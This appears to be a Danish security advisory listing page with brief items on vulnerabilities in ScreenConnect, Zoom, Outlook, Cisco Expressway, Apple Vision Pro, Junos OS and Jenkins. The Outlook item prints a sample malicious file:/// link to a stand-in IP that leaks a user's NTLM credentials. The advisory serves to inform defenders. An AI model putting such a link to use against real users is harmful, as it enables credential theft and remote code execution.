sårbarheder

ConnectWise retter kritisk ScreenConnect-sårbarhed

ConnectWise har afsløret to sårbarheder, hvor af den ene er kritisk, i ScreenConnect applikation til fjernskriveborde.

Fejlen er en sårbarhed, der gør det muligt for trusselsaktører at omgå autentificering. Den har id’et CVE-2024-1709 og en CVSS-score på maksimale 10. Beskrives som værende "ekstrem triviel" at udnytte ifølge en post på X fra sikkerhedsfirmaet Horizon3.

Dansk
Keywords: 

Kritisk fejl i Zoom

I Zoom' skrivebords app og VDI-klienterne samt Meeting SDK til Windows er der konstateret en sårbarhed i forbindelse med inputvalidering, som kan åbne op for, at en uautoriseret ondsindet aktør over netværket kan udføre privilegieeskalering på sårbare systemer.

Ukorrekt inputvalidering i Zoom Desktop Client til Windows, Zoom VDI Client til Windows og Zoom Meeting SDK til Windows kan bevirke, at en uautoriseret bruger potentielt kan udføre en eskalering af privilegier via deres netværksadgang.

Følgende Desktop Apps er berørte af sårbarheden:

Dansk

Kritisk sårbarhed i flere Microsoft Outlook produkter

En ondsindet aktør kan eksempelvis udforme nedenstående link, som omgår Protected View Protocol, hvilket kan fører til indsigt i fortrolige NTLM-legitimationsoplysninger for en lokal bruger og dermed til at udføre et RCE angreb.

KUN EKSEMPEL: *<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*

Følgende systemer er berørt af sårbarheden:

Dansk

Sårbarheder i Cisco Expressway Serie

Cisco har rettet adskillige sårbarheder i deres Expressway Serie, hvoraf to af dem er vurderet til at være kritiske.

Det skriver Bleeping Computer på baggrund af en advisory fra Cisco.

De kritiske sårbarheder har id’erne CVE-2024-20252 og CVE-2024-20254 og begge med en score på 9,6 på CVSS-skalaen. De udsætter sårbare enheder for angreb på tværs af websteder, dvs. Cross-Site Request Forgery,

Dansk
Keywords: 

Apple retter en 0-dagsfejl i Apple Vision Pro

Knap er Apples nyeste flagskibsprodukt - Augmented Reality og Virtual Reality-headsettet Apple Vision Pro - kommet i handlen, før der er udsendt en sikkerhedspatch, der retter en sårbarhed, som angribere angiveligt allerede har udnyttet.

Det skriver Tech Crunch. 

Der er tale om en sårbarhed i WebKit-motoren, der blev håndteret i de øvrige produkter som iPhones, iPads, Macs og Apple TV i sidste uge. Nu er rettelsen også tilpasset Apple visionOS 1.0.2, som er den software, der kører på Vision Pro. Sårbarheden har id’et CVE-2024-23222 og en CVSS-score på 8,8.

Dansk
Keywords: 

Sårbarheder i Junos OS

Der er fundet flere sårbarheder i Junos OS SRX Series og EX Series, hvoraf en betegnes som alvorlig (’high’).  Problemerne påvirker alle versioner af Junos OS på SRX-serien og EX-serien. Det fremgår af en ’out-of-circle’-bulletin på Junos supportportal.

Dansk
Keywords: 

Kritisk sårbarhed i Jenkins-produkter

Der er fundet en række sårbarheder i Jenkins og samt nogle af de plugins, der kan bruges med Jenkins.

Det skriver The Hacker News m.fl.

Den mest kritiske sårbarhed har id’et CVE-2024-23897 og en CVSS-score på 9.8. Den beskrives som en ’arbitrary file read’, som i realiteten gør det muligt for en angriber at afvikle kode fra ’remote’. I alt er der registreret 11 CVE’er, hvoraf seks er over scoren 7,1, dvs. de har betegnelsen alvorlige.
De berørte produkter er følgende:

Dansk
Keywords: 

Sider

Abonnér på RSS - sårbarheder